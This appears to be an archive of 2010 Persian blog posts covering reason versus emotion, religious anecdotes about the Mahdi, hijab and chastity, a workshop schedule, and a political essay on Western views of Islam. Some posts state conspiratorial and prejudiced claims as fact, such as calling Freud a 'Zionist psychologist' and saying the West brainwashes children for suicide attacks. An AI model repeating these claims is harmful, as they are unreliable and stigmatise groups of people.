از منظر طی طریق کمال انسانی نیز، احساس به مثابه اسبی تنومند و سریع است که می‌تواند انسان را به هر جایی بکشاند. عقل نیز به مانند اسبی رنجور و ترسو است که جهت برداشتن هر قدمی مدتی را صرف سنجیدن خوب و بد آن می‌کند. اگر انسانی جهت طی طریق، از ابتدا احساسات را برگزیند و به خیال باطل خویش عرفان را مسیر خود قرار دهد، با احتمال بسیاری گمراه خواهد شد چون این اسب چموش سر به هر بیابانی می‌گذارد و انسانی که بدون توانایی سوار بر آن شود، قدرت رام کردن انرا نخواهد داشت و به ناکجا آباد خواهد رفت.
و اما عقل، برای شروع راه بهترین ابزار است. پس از اینکه انسان در مسیر عقل، به توانایی‌های ابتدایی رسید و توانست ضمیر و احساس خود را تا حدی رام کند و در چهارچوب قرار دهد، توانست تفاوت نفس با فطرت را تمیز دهد، تفاوت فرهنگ و عادت را با خواست قلبی درک کند – که این مسیر خود ممکن است زمان زیادی ببرد -تازه می‌تواند بر اسب تنومند احساسات تکیه کند و مسیر را سریعتر بپیماید، درست مانند ساختمانی که زیربنای آنرا با خاک برداری و بتن می‌ریزند ولی مابقی را با مقداری آهن و خشت به راحتی به انجام می‌رسانند.

باتلاق خوش قیافه احساسات

در زندگی امروز، که شیاطین بزرگ طوفان‌های احساسی به پا می‌کنند و در این تخصص استادها پرورش می‌دهند، تکیه بر اسب احساسات، هرچقدر هم که مسلط باشیم، از اطمینان پایینی برخوردار است. در دنیایی که طوفان‌های مهیب احساسی آنرا تهدید می‌کنند، زیربنای عقلی ساختمان زندگی را باید خیلی محکمتر از قبل ساخت.
درست است که عقل کند است و انسان را خیلی جلو نمی‌برد، ولی حداقل مطمئن خواهیم بود که همان مقدار را درست برده است. به حکم همان عقل، در شرایط معمولی باید از احساسات برای جلو رفتن بهره جست، اما در سرزمینی که باتلاق‌های پاخوره دارد، نداشتن پا و ویلچر نشین جلو رفتن بهتر از داشتن پا – که اصلی‌ترین ابزار طی مسیر است – خواهد بود.

محبوس کردن احساسات به دشواری قطع کردن پا است. زمان بسیاری باید تلاش کرد تا در هر شرایطی، هر کاری – از جمله کارهای بسیاری که از بچگی به انجام آنها عادت کرده‌ایم – را با عقل و دلیل بسنجیم و به علت انجام آنها بسنده نکنیم اگر دلیلی بر خلاف عادت ها و کارهای خود یافتیم، قاطعانه با آن کار مخالفت کنیم و دیگر آنرا انجام ندهیم. با انجام این تمرین یاد خواهیم گرفت که کارهای جدیدی که انجام می‌دهیم هم دلیل داشته باشد. با گذشت مدت زیادی از تسلط به این دو موضوع، خیلی از اوقات کارهایی را انجام می‌دهیم که پس از انجام آنها دلیل نمایان می شود (دیگر اسب احساس تا حدود خوبی رام شده است) و از اینجا کم کم می‌توان به احساس پر و بال داد، البته در کنترل کامل عقل.
متاسفانه دشمن با شناسایی نوع انسان، وی را مورد حمله قرار داده است و در حال حاضر از آنجایی که اکثر قابل توجه انسان‌ها بدون فکر عمل می‌کنند و محور درستی امور را احساس می‌دانند نه استدلال، به شدت آسیب‌پذیر و در موارد بسیاری تحت سلطه کامل دشمن هستند. امید است که ما با هشیاری کافی بتوانیم در مقابل این حربه مقاومت کنیم و خود را در این زمانه دشوار، به ناچار به ویلچر مجهز نماییم.

http://abiusx.com/archive/paper/Emotional_and_Rational_Thinking.pdf

Bagozzi, R. P. Dholakia, U. M. & Basuroy, S., 2003. How Effortful Decisions Get Enacted: The Motivating Role of Decision Processes, Desires, and Anticipated Emotions. Journal of Behavioral Decision Making, 16, pp. 273–295.

برنامه کارگاه‌ها و نشست‌های نمایشگاه رسانه‌های دیجیتال

AbiusX — Fri, 08 Oct 2010 07:10:24 +0000

با سلام

از آنجایی که مطلب بعدی تا چند روز دیگر آماده نمی‌شود،

برنامه نشست‌هایم در نمایشگاه رسانه‌های دیجیتال را برایتان می‌نویسم

اگر علاقه‌مند بودید شرکت کنید، خوشحال خواهم شد.

رمزنگاری و رمزشکنی شنبه ۱۷ مهر ۱۳۸۹ ساعت ۱۵:۳۰ الی ۱۷

امنیت فضای سایبر شنبه ۱۷ مهر ۱۳۸۹ ساعت ۱۹:۳۰ الی ۲۱

آسیب‌شناسی بازی‌های ویدئویی پنجشنبه ۲۲ مهر ۱۳۸۹ ساعت ۱۱ الی ۱۲:۳۰

مشغولیت

AbiusX — Thu, 26 Aug 2010 20:22:33 +0000

این مدت یکمی زیادی مشغولم، یکمی هم توانم کمتره… برای همین شاید یک مدت ننویسم، هرچند خیلی دوست دارم که دائم بنویسم و بیشتر از ۸ موضوع نیمه کاره هم دارم، به هر حال ببخشید.
ممکنه این یک مدت تا اواخر مهرماه هم طول بکشه. همه سعیم رو خواهم کرد که اینطور نباشه ولی شاید بشه. بنابراین …. فعلا

فردا امام زمان ظهور می‌کند

AbiusX — Fri, 20 Aug 2010 12:11:55 +0000

پنج شنبه عصر بود. اذان نزدیک بود. ازم پرسید :

- به نظرت امام زمان کی ظهور می‌کنه؟

گفتم فردا. گفت :

- نه فردا که ظهور نمی‌کنه !

گفتم چرا. ظهور می‌کنه. گفت :

- نه بابا مطمئن باش فردا ظهور نمی‌کنه.

گفتم مطمئنم ظهور می‌کنه. همین فردا. گفت :

- من مطمئنم ظهور نمی‌کنه.

می‌دونستم چرا این حرف رو می‌زنه. نمی‌دونست چرا این حرف رو می‌زنم. گفتم :

- می‌دونی با این حرفت ظهور آقا رو عقب می‌ندازی؟ حالا اگه فردا ظهور نکنه تقصیر توئه.

ناراحت شد. خیلی زیاد. رفت تو فکر، گریش گرفت. فکرشم نکرده بود، حواسش نبود که اینطوریه، ته دلش هم که شک داشته باشه، آماده نباشه، فکر کنه آقاش ظهور نمی‌کنه، ارادش تو تعلیق ظهور تاثیر می‌ذاره…

گفت :

- فردا ظهور می‌کنه. مطمئنم.

عفت، سرمایه یکبار مصرف

AbiusX — Wed, 11 Aug 2010 20:50:32 +0000

شکر خداوند که ضیافت عظیمش آغاز شد و ما زنده بودیم و به فضل خودش با اینکه هیچ نمی‌کنیم از فیوضات بیشمار بهره‌مند می‌شویم. همانطور که به خودم قول داده بودم یک مطلب مهم را در اولیه روزه ماه مبارک رمضان می‌نویسم، امیدوارم که مورد پسند عزیزان خواننده واقع شود.

باب مسئله حجاب در ماه‌های اخیر گشوده بوده و کنش و واکنش‌های بسیاری در این موضوع صورت گرفته است. یکی از پر رونق‌ترین سوالاتی که مخالفان مبارزه با بدحجابی مطرح می‌کنند، آنست که آیا حجاب در حال حاضر مهمترین کمبود و مسئله جامعه ماست؟ چرا به نسبت اهمیت حجاب در اسلام در حال حاضر به آن نمی‌پردازید؟

بنده کاری به آن ندارم که حجاب مانند تمام احکام دیگر اسلام ممکن است در برهه خاصی از زمان اهمیت دوچندان و حتی صدچندان بیابد (به مانند حکم تحریم گوشت‌های وارداتی که توسط آیت الله خامنه‌ای در قبل از انقلاب صادر گردید) کما اینکه الان در آن برهه هستیم. کاری هم به آن ندارم که حجاب چه مزایا و چه مضراتی دارد که به این مهم نیز در مطالب قبلی به اختصار پرداخته شده بود.

عفت، یکی از مهمترین سرمایه‌ها و گوهرهاییست که در فطرت انسان قرار داده می‌شود. این سرمایه نیز به مانند محبت و عاطفه یا حقپذیری انسان، در طی زمان باید جلا یابد تا بتواند آنگونه که بایسته و شایسته است به ثمر نشیند. انسان‌ها از بدو تولد با حیا به دنیا می‌آیند و همانگونه که در داستان حضرت آدم می‌بینیم، هنگامی که تنبیه شدند و به زمین فرستاده شدند، عورت آنان آشکار گردید و از یکدیگر حیا کرده خود را پوشانیدند. کودکان و نوجوانان نیز از وجود این سرمایه در درون خود به خوبی مطلع هستند.

در تاریخ نیز، در تمام این چندهزار سالی که از عمر انسان می‌گذرد، پوشش و حیا وجود داشته و انسان‌ها همواره خود را می‌پوشانیده‌اند. در تمام این اعصار نیز انسان‌هایی بوده‌اند که با لگدمال کردن فطرت خویش، شهوت‌رانی کرده‌اند و گوهر حیا و عفت خویش را کوچک و کوچکتر گردانیده‌اند. مهمترین اتفاق تاریخی مربوط را می‌تواند فراگیر شدن فرویدیسم در صده آخر هزاره دوم دانست. این روانشناس صهیونیست، با ارائه نظریه کشش جنسی، خرمن حیا و عفت بشریت را به یکباره به آتش کشید به طوری که امروزه بی عفتی در جوامع غربی معدودا ضد فطرت دانسته می‌شود و کودکان را از بدو تولد آنچنان تربیت می‌کنند که گوهر عفت آنان محو گردد.

راجع به نیاز انسان و جامعه انسانی به عفت و خانواده عفیف صحبت نکنم که بشر کاوشگر و هشیار امروزی به خوبی از مزایا و مضرات آن با خبر است (آنچنان که در جوامع به اصطلاح توسعه یافته کنونی، در حال دست و پا زدن برای احیا کردن عنصر خانواده عفیف هستند) به یک مثال بسنده می‌کنم، آنهم اینکه یک مرد ۵۰ ساله که در جامعه با دختران جوان و زیبای بی عفت متعدد روبروست، چرا و به چه دلیل عقلی و غیرعقلی باید به همسر مسن خود وفادار بماند؟ (چنانکه آمار نشان از آن دارد که وفادار نیز نمی‌ماند)

عفت سرمایه‌ایست که هم در بعد فردی و هم در ابعاد اجتماعی خویش، می‌توان قید یکبار مصرف بودن را به آن نسبت داد. عفت اگر از بین برود، بدین سادگی برنخواهد گشت و فرد یا جامعه‌ای که گوهر عفت خود را از دست داد، دیگر آنرا بدست نخواهد آورد، مگر با یک معجزه. حال شاید بهتر بتوان اهمیت مسئله حجاب و حیا در اجتماع را درک کرد و برای نگهداری این گوهر برنامه‌ریزی نمود.

برای حسن ختام مطلب، به حدیث زیبایی از امام محمد باقر (ع) بسنده می‌کنم:

«الحیاء و الایمان مقرونان فی قرن، فاذا ذهب احدهما تبعه صاحبه»
(میزان الحکمه ح ۴۵۶۵)

حیا و ایمان به هم پیوسته‌اند، هرگاه یکی از آنها برود دیگری هم در پی آن روانه می‌شود.

در مطالب بعدی با موضوع «چرا مرگ بر آمریکا» به این مهم مجددا پرداخته خواهد شد.

ترس از اسلام، ترس از ایران

AbiusX — Wed, 04 Aug 2010 16:58:02 +0000

اگر از دید رسانه‌های صهیونیستی جهان به اسلام و ایران نگاه کنیم، چهره‌ای عقب مانده، دگم و متحجر از اسلام و خصوصا ایران دیده می‌شود. در سالهای اخیر این چهره درباره ایران کمرنگ‌تر شده زیرا رسانه‌ها و اخبار ایران به مجامع جهانی نفوذ بیشتری کرده‌اند و اگر اینگونه دروغ‌پردازی‌ها ادامه پیدا کند، اعتمادزدایی خواهد شد. ولی مردم لبنان، فلسطین، عراق، افغانستان و کلا همه شیعیان و سنی‌های مبارز ضدسکولار ، به عنوان انسان‌هایی بدون هیچ پشتوانه فکری و کاملا شستشوی مغزی داده شده معرفی می‌شوند، در حالی که آمارها نشان می‌دهد در هندوستان که ادیان زیادی وجود دارد و دین‌‌ها آزاد هستند، اکثر اقشار سطح بالا و دارای تحصیلات شیعه و یا سنی هستند.

و اما چرا این استراتژی تخریبی / تبلیغی در پیش گرفته شده؟ قبل از پاسخ دادن به این سوال، باید انبر فشار اسلام سنتی / اسلام مدرن را بررسی کنیم :

در حال حاضر دو نوع از اسلام در جهان تبلیغ می‌شود، یکی اسلام طالبانی که با اصطلاح طالبانیزم، تحجر و قشرگرایی شناخته می‌شود. این نوع اسلام جاذبه‌های ذاتی اسلام را داراست ولی چون در آنها افراط شده، بازخوردی دارد که با فطرت انسان سازگار نیست بنابراین در خیلی از موارد، غیر انسانی (نه با تعریف غربی که در آن همجنس‌گرایی انسانی می‌شود) خواهد بود.

نوع دیگر اسلام، اسلام مدرن یا لیبرال یا اسلام اصلاح شده یا آمریکاییست. این اسلام در واقع دینیست که به عنوان نیاز روحی و معنوی انسان مصرف می‌شود و درون‌مایه و مسیر اصلی زندگی نیست. این اسلام، نه مذهب (به معنی راه ذهب و راه رفتن ) است، و نه دین. یک نوع عرفان مجازیست که تمام نقاط اتصال آن به تاثیرگذاری در حوزه اجتماع و همچنین اجازه اینگونه تاثیرگذاری استحاله شده و به علاوه احکام سختی مانند جهاد و گاها روزه و خمس از آن با کمرنگ کردن مداوم حذف شده‌اند.

انبر اسلام سنتی / اسلام مدرن

از طرف دیگر با معرفی دائمی مسیری که مسیحیت تحریف شده کلیسای اروپا طی کرد، که مقصدی به غیر از سکولاریزم برنمی‌تابید، قصد دارند که اسلام را نیز به همین گونه نشان دهند و تنها راه‌حل را اسلام لیبرال معرفی کنند.

در میانه فشار این انبر، جهانی که قصد آشنایی با اسلام را دارد، ایده‌آلی نمی‌یابد و مسلمانی که قصد شناسایی دقیقتر دین و مصداق‌های عملکرد آن (جنبش بیداری اسلامی) را دارد، به ناچار یا دچار طالبانیزم می‌شود و یا به اسلام لیبرال رضایت می‌دهد.

و اما اسلام واقعی، اسلام ناب محمدی، اسلام اصیل در کجاست؟ اسلام، به دو بخش پوسته و هسته تقسیم می‌شود. هسته آن غیر قابل تغییر است، مانند توحید، مانند اصل نماز، ولی پوسته آن قابل اجتهاد و تغییر است، مانند احکام اقتصادی و یا شیوه برگزاری نماز. طالبانیزم قائل به آنست که اسلام ثابت است و حتی پوسته آنرا نباید از زمان پیامبر تغییر داد، و از همین رو متحجر (سنگ و سخت) نامیده می‌شوند. اسلام لیبرال قائل به آنست که هسته اسلام نیز قابل اجتهاد و تغییر بسته به شرایط زمان است، به عنوان مثال جهاد را می‌توان کلا از دین حذف کرد، توحید را می‌توان تابع دموکراسی قرار داد یا عدل و ظلم را فعلا به کناری سپرد !

و اما در پاسخ سوال اول، باید دانست که ترسی که غرب و آمریکا از ایران دارند و نگران شکسته شدن حرمت و سلطه جهانی خود (به خصوص سلطه رسانه‌ای که تنها ضامن آنهاست) هستند، در واقع ترس از مطرح شدن اسلام ناب است، اسلامی که نسخه‌های تحریف شده طالبانی و لیبرال و حتی سنی آن نیز طرفداران بیشماری در جهان پیدا کرده‌است. آنها کاملا بر این امر واقفند که اسلام، ظلم را بر نمی‌تابد و جهاد را در بر دارد، لذا با سرمایه‌گذاری‌های غیرقابل باور و در پروژه‌های طولانی مدت، کودکانی را شستشوی مغزی می‌دهند و در عملیات انتحاری ضد ارزشی به کار می‌گیرند تا قداست جهاد را تخریب کنند.

در نهایت، دشمنان قسم خورده اسلام بهتر از ما مسلمانان می‌دانند که اسلام تا به هنگامی که شهادت و انتظار را داراست، آسیب‌پذیر نخواهد بود.

روایتی از منتظران واقعی

AbiusX — Thu, 29 Jul 2010 16:59:13 +0000

در این شب جمعه متعلق به آقا که انشالله فردا امام زمان (عج) ظهور خواهند کرد، روایت بسیار مهمی را در ارتباط با انتظار واقعی تقدیم شما می‌کنم. روایت را از یکی از دوستان عزیزم شنیده‌ام که البته سند قطعی ندارد ولی مضمون آن در روایات مستند بسیاری آمده و بعد از خواندن متوجه درستی آن خواهید شد. ( انشالله )

در زمان‌های گذشته در شهری کوچک، مردی بود بسیار عاشق امام زمان و منتظر واقعی، به طوری که هر شب و روز جمعه سلاح بر می‌گرفت و لباس رزم می‌کرد، آماده به دشت و کوه می‌زد و منتظر بود تا آقا ظهور کند و وی در رکابشان آماده باشد. سالهای سال گذشت و یک شب جمعه، مرد داستان ما بسیار ناامید شده بود و همانطور که در بیابان گذر می‌کرد، با خود زمزمه می‌داشت که «ای امام زمان (عج) چرا ظهور نمی‌کنید همه اهالی شهر منتظر ظهور شما هستند همیشه برای معرفت شما برنامه برگزار می‌کنند و هر شب جمعه همگی منتظر هستند شما ظهور کنید، آماده و در رکاب. واقعا چرا ظهور نمی‌کنید دیگر چه چیز باید آماده باشد…» و در همین حال خود بود که به خیمه‌ای رسید.

وارد خیمه شد وجود مقدس و نورانی امام عصر (عج) را در آنجا درک کرد و بسیار مسرور و شگفت‌زده شد. امام به وی گفت «اگر می‌خواهی بدانی چرا ظهور نمی‌کنیم، شب جمعه هفته دیگر بهترین مومنین و منتظران شهرتان را به منزل خود دعوت کن و مهمانی ترتیب بده و بگو امام زمانمان سفارش کردند که من این میهمانی را تشکیل داده و شما را دعوت کنم. همچنین دو بز تهیه کن و در پشت بام ببند.»

هفته‌ای دیگر سپری شد و مرد ۴۰ نفر از مومن‌ترین مومنان شهر را گلچین کرده برای میهمانی خویش دعوت نمود. ساعتی از شب گذشته بود و مهمانان نشسته از حضرت سخن می‌راندند و از اینکه چگونه حاضرند جان و مال و ناموس خود را در راه آن حضرت فدا کنند که ناگهان نوری محیط را احاطه کرد به طوری که بر همه حضار الهام گردید که حضرت در پشت‌بام حضور دارند. میزبان، یعنی همان مرد منتظر، شتابان برخاست و به پشت بام رفت. حضرت را در آنجا دریافت و بسیار مسرور شد. حضرت به وی دستور داد که یکی از این بزها را سر ببر و خونش را در ناودانی منزل خود رها کن.

ساعتی بگذشت و حضار دیدند که خونی تازه از ناودانی به پایین سرازیر است و میزبان باز نمی‌گردد. یکی دیگر از حضار که ارادت خاصی به حضرت داشت، سراسیمه برخاست و به پشت بام رجعت کرد. در آنجا حضرت را دریافت و رخسارش گلگون شد. حضرت پس از صحبتی اندک، به وی نیز دستور داد که بز دیگر را سر ببرد و خون آنرا در ناودان هدایت کند. مرد دوم نیز چنین کرد. پاسی بگذشت و دو مرد و امام زمانشان در پشت بام تنها بودند و کسی دیگر از حضار بالا نیامد. حضرت به آنها خطاب کردند «در شهر شما تنها دو نفر منتظر واقعی من بودند و آندو شمایید.» و سپس رفتند.

دو مرد به منزل بازگشتند و دیدند هیچکس در داخل خانه نیست. سراغ یکی از میهمانان به منزل او رفتند و او را بسیار ترسیده و رنگ از رخسار پریده دریافتند، بدانها گفت « ما همگی فکر کردیم حضرت شما دو تن را گردن زده است و از ترس از مجلس گریختیم! »

رمزنگاری و رمزشکنی	شنبه ۱۷ مهر ۱۳۸۹	ساعت ۱۵:۳۰ الی ۱۷
امنیت فضای سایبر	شنبه ۱۷ مهر ۱۳۸۹	ساعت ۱۹:۳۰ الی ۲۱
آسیب‌شناسی بازی‌های ویدئویی	پنجشنبه ۲۲ مهر ۱۳۸۹	ساعت ۱۱ الی ۱۲:۳۰